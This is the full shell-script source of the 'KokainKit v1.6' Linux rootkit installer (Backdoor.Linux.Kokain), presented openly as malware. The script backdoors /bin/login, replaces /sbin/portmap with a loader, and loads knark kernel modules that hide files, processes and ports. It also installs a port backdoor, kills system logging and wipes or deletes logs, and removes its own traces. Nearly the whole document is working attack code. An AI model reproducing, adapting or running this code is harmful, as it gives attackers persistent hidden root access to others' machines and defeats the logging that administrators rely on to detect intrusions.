Backdoor.Linux.Kokain - Source Code

1. #!/bin/sh
2.  
3. # KokainKit v1.6 by deka
4. # -
5. # A rootkit based on knark and cobolt.
6. # Do not Distribute!
7. # -
8.  
9. TORNDIR=/usr/src/.puta
10. THEPASS=$1
11. DITTPORT=$2
12. THEDIR=/usr/lib/$THEPASS
13.  
14. echo "---------------------------------------"
15. echo "       KokainKit v1.6 by dekah&self"
16. echo "---------------------------------------"
17. echo ""
18. echo "Using magic word $THEPASS and dittrichport $DITTPORT."
19. echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
20.  
21. if ! test "$(whoami)" = "root"; then
22.   echo "  - UID0 check failed"
23.   echo ""
24.   sleep 3
25.   echo "FATAL: You're not root"
26.   exit 1
27. fi
28.  
29. if test -d "$TORNDIR"; then
30.   echo "  - T0rnKit found. Screwing it up"
31.   killall -9 in.inetd
32.   killall -9 t0rntd
33.   echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
34.   echo "" > /usr/sbin/in.inetd
35.   echo "ap" > $TORNDIR/.1file
36.   echo "255.255" > $TORNDIR/.1addr
37.   echo "255.255" > $TORNDIR/.1logz
38.   echo "ap" > $TORNDIR/.1proc
39. fi
40.  
41. if ! test -d "/usr/include"; then
42.   echo "  - /usr/include does not exist, making it (ugly)..."
43.   mkdir /usr/include
44. fi
45.  
46. if ! test -d "/usr/include/pwdb"; then
47.   echo "  - /usr/include/pwdb does not exist, making it (ugly)..."
48.   mkdir /usr/include/pwdb
49. fi
50.  
51. mkdir $THEDIR
52. if test -d "$THEDIR"; then
53.   echo "  - Secret dir created"
54. else
55.   echo "  - MkDir failed"
56.   echo ""
57.   echo "FATAL: Unable to create the secret directory"
58.   exit 1
59. fi
60.  
61. cd src
62. echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
63. echo "#define MAGIC_DIR  \"$THEDIR\"" >> kokain.h
64.  
65. gcc -O2 cobolt.c -o cobolt
66. if test -r "./cobolt"; then
67.   echo "  - Cobolt compiled"
68. else
69.   echo "  - gcc failed"
70.   echo ""
71.   cd ..
72.   sleep 3
73.   echo "FATAL: Unable to compile Cobolt"
74.   exit 1
75. fi
76. touch -acmr /bin/login cobolt
77. cp /bin/login $THEDIR/login1
78. cp cobolt $THEDIR/login2
79. echo "  - Cobolt installed"
80.  
81. gcc -O2 autoexec.c -o autoexec
82. if test -r "./autoexec"; then
83.   echo "  - AutoExec compiled"
84. else
85.   echo "  - gcc failed"
86.   echo ""
87.   cd ..
88.   echo "FATAL: Unable to compile AutoExec"
89.   exit 1
90. fi
91.  
92. touch -acmr /sbin/portmap autoexec
93. cp /sbin/portmap $THEDIR/portmap
94. rm -f /sbin/portmap
95. cp autoexec /sbin/portmap
96. echo "#!/bin/sh" > $THEDIR/autoexec
97. echo "  - AutoExec installed"
98. cd ..
99.  
100. killall -9 syslogd klogd
101. ./wipe u root >/dev/null 2>&1
102. rm -f /var/log/messages /var/log/secure
103. cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
104. cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
105. cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
106. cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
107. echo "  - Logs cleaned"
108.  
109. #echo "" > /etc/hosts.allow
110. #echo "" > /etc/hosts.deny
111. #echo "  - Hosts.deny/Hosts.allow cleaned"
112. echo "  - Patching dittrich..."
113. ./bpatch ./dittrich __PATCHPort__ $DITTPORT
114.  
115. cat <<E0F>> $THEDIR/.bashrc
116. alias ls="ls --color -alF"
117. alias dir="dir --color"
118. export PS1="\u@\h:\w# "
119. export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
120. cd
121. E0F
122. echo "  - .bashrc created"
123.  
124. cp -R dittrich stuff $THEDIR
125. echo "  - Stuff installed"
126.  
127. mkdir $THEDIR/knrk
128. cd knark
129. make >/dev/null 2>&1
130. echo "  - Knark compiled"
131. cd ..
132. rm -rf knark/knrksrc knark/Makefile
133. cp -R knark/* $THEDIR/knrk
134. echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
135. echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
136. echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
137. echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
138. echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec
139. echo "$THEDIR/dittrich" >> $THEDIR/autoexec
140. echo "killall -31 dittrich" >> $THEDIR/autoexec
141.  
142. /sbin/portmap >/dev/null 2>&1
143. echo "  - Knark installed"
144.  
145. if test -d "/var/named/ADMROCKS"; then
146.   rm -rf /var/named/ADMROCKS
147.   echo "  - AdmRocks erased"
148. fi
149.  
150. cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
151. rm -f /etc/inetd.conf
152. cp /tmp/blahah /etc/inetd.conf
153. rm -f /tmp/blahah
154. echo "  - Inetd.conf fixed"
155.  
156. PATH=/sbin:$PATH
157. syslogd
158. klogd
159. echo "  - Syslogd/Klogd restarted"
160. cd ..
161. rm -rf *kokain*
162. echo "  - KokainKit removed"
163.  
164. echo ""
165. #echo "--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--"
166. if test -d "/proc/$THEPASS";
167. then
168.   echo "Knark installed successfully."
169. else
170.   echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
171.   cp $THEDIR/login2 /bin/login
172. fi
173. echo "kitinst $THEPASS $DITTPORT"
174. # - EoF - #